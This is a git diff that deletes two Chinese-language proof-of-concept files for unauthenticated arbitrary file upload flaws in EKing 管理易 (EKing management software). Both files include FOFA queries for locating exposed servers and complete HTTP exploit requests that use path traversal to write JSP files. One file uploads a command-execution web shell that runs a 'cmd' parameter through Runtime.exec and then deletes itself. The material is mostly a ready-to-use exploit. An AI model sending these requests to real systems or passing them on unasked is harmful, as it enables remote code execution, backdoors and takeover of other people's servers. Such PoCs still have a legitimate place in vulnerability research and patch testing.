diff --git a/wpoc/eking管理易/eking管理易FileUpload接口存在任意文件上传漏洞.md b/wpoc/eking管理易/eking管理易FileUpload接口存在任意文件上传漏洞.md deleted file mode 100644 index 128a11b..0000000 --- a/wpoc/eking管理易/eking管理易FileUpload接口存在任意文件上传漏洞.md +++ /dev/null @@ -1,28 +0,0 @@ -# eking管理易FileUpload接口存在任意文件上传漏洞 - -EKing-管理易 FileUpload.ihtm 接口处存在文件上传漏洞,未经身份验证的远程攻击者可利用此漏洞上传任意文件,在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。 - -## fofa - -```yaml -app="EKing-管理易" -``` - -## poc - -```yaml -POST /app/FileUpload.ihtm?comm_type=EKING&file_name=../../rce.jsp. HTTP/1.1 -Host: -User-Agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 -Content-Type: multipart/form-data; boundary=WebKitFormBoundaryHHaZAYecVOf5sfa6 - ---WebKitFormBoundaryHHaZAYecVOf5sfa6 -Content-Disposition: form-data; name="uplo_file"; filename="rce.jpg" - -<% out.println("hello");%> ---WebKitFormBoundaryHHaZAYecVOf5sfa6-- -``` - -![d6195b5041564ca4bb7b6ae0a4437513.png](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407301642889.png) - -![25f79982d40949828bd29e1d81404123.png](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407301643141.png) \ No newline at end of file diff --git a/wpoc/eking管理易/eking管理易Html5Upload接口存在任意文件上传漏洞.md b/wpoc/eking管理易/eking管理易Html5Upload接口存在任意文件上传漏洞.md deleted file mode 100644 index 5e7e7d6..0000000 --- a/wpoc/eking管理易/eking管理易Html5Upload接口存在任意文件上传漏洞.md +++ /dev/null @@ -1,68 +0,0 @@ -# eking管理易Html5Upload接口存在任意文件上传漏洞 - -eking管理易Html5Upload接口存在任意文件上传漏洞,未经身份验证的远程攻击者可利用此漏洞上传任意文件,在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。 - -## fofa - -```yaml -app="EKing-管理易" -``` - -## poc - -创建临时文件 - -```yaml -POST /Html5Upload.ihtm HTTP/1.1 -Host: -User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 -Content-Type: application/x-www-form-urlencoded -Connection: close - -comm_type=INIT&sign_id=shell&vp_type=default&file_name=../../shell.jsp&file_size=2048 -``` - -写入文件内容 - -```jinja2 -POST /Html5Upload.ihtm HTTP/1.1 -Host: -User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 -Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryj7OlOPiiukkdktZR -Connection: close - -------WebKitFormBoundaryj7OlOPiiukkdktZR -Content-Disposition: form-data; name="comm_type" - -DATA -------WebKitFormBoundaryj7OlOPiiukkdktZR -Content-Disposition: form-data; name="sign_id" - -shell -------WebKitFormBoundaryj7OlOPiiukkdktZR -Content-Disposition: form-data; name="data_inde" - -0 -------WebKitFormBoundaryj7OlOPiiukkdktZR -Content-Disposition: form-data; name="data"; filename="chunk1" -Content-Type: application/octet-stream - -<% java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();int a = -1;byte[] b = new byte[2048];out.print("
");while((a=in.read(b))!=-1){out.println(new String(b,0,a));}out.print("
");new java.io.File(application.getRealPath(request.getServletPath())).delete();%> -------WebKitFormBoundaryj7OlOPiiukkdktZR-- -``` - -保存文件 - -```javascript -POST /Html5Upload.ihtm HTTP/1.1 -Host: -User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 -Content-Type: application/x-www-form-urlencoded -Connection: close - -comm_type=END&sign_id=shell&file_name=../../shell.jsp -``` - -![image-20241012132747292](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410121327356.png) - -![image-20241012132754554](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410121327613.png) \ No newline at end of file